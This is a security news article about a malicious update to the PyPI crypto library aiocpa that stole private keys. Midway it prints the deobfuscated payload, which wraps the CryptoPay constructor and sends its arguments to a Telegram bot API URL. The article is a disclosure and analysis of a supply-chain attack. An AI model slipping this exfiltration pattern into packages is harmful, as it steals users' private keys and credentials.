Malicious Update in Python Crypto Library Targets Private Keys via Telegram

The Phylum Research Team has uncovered a malicious update to the PyPI package aiocpa, a crypto library widely used for its synchronous and asynchronous Crypto Pay API functionality. The attacker weaponized the library to exfiltrate private keys to a Telegram bot, marking a severe breach of trust for its users.

The malicious activity was introduced in version 0.1.13 of the aiocpa library, released on November 20, 2024. The payload was hidden within an obfuscated code blob in the cryptopay/utils/sync.py file, designed to execute upon module import. The researchers explained, “Just to recap, we’re seeing a crypto library that dynamically alters the class’s constructor upon module import to exfiltrate the victim’s private keys when calling the class’s constructor.”

Screenshot of the PyPI landing page for aiocpa

The attacker cleverly bypassed detection mechanisms by keeping the associated GitHub repository clean of malicious code. This tactic ensured that only the PyPI-hosted package carried the harmful payload, leaving source reviewers none the wiser.

The malicious code wraps the CryptoPay.__init__ method, which initializes the library, to include additional functionality. While preserving the original behavior, the wrapper sends sensitive data—most notably the private key—via a Telegram bot API. Researchers uncovered the key piece of code responsible for the exfiltration:

from cryptopay.client import CryptoPay
import urllib
init = CryptoPay.__init__
def __init__(*args, **kwargs):
    init(*args, **kwargs)
    try:
        urllib.request.urlopen(f"<https://api.telegram.org/bot7858967142:AAGeM6QvKdEUK9ZWD9XoVM_Zl1cmj_mlyJo/sendMessage?chat_id=6526761736&text={args[1:]}>")
    except: pass
CryptoPay.__init__ = __init__

The args[1:] parameter captures all arguments passed to the constructor, including the private key and any additional sensitive data. This exploitation effectively transforms a trusted library into a data siphoning tool.

Adding to the complexity, the GitHub repository for aiocpa appeared clean, with no traces of the malicious payload. The report notes, “The attacker updated a local copy of the repo with the malicious payload and then published that package to PyPI, leaving the GitHub repo with the same version numbers malware-free—a clear attempt at evasion.”

Before its removal, aiocpa had been downloaded nearly 4,000 times in the preceding month, according to PyPI statistics.

While the identity of the perpetrator remains unknown, this incident is a stark reminder of the vulnerabilities inherent in the software supply chain. As open-source adoption continues to grow, so does the responsibility to ensure its safety.

Related Posts:

• PyPI Poisoned: 116 Malicious Packages Target Windows and Linux
• Python’s New Threat: Malicious PyPI Packages Targeting Linux Devices
• PyPI Packages Leak User Data to Telegram Bot, Iraqi Cybercriminals Suspected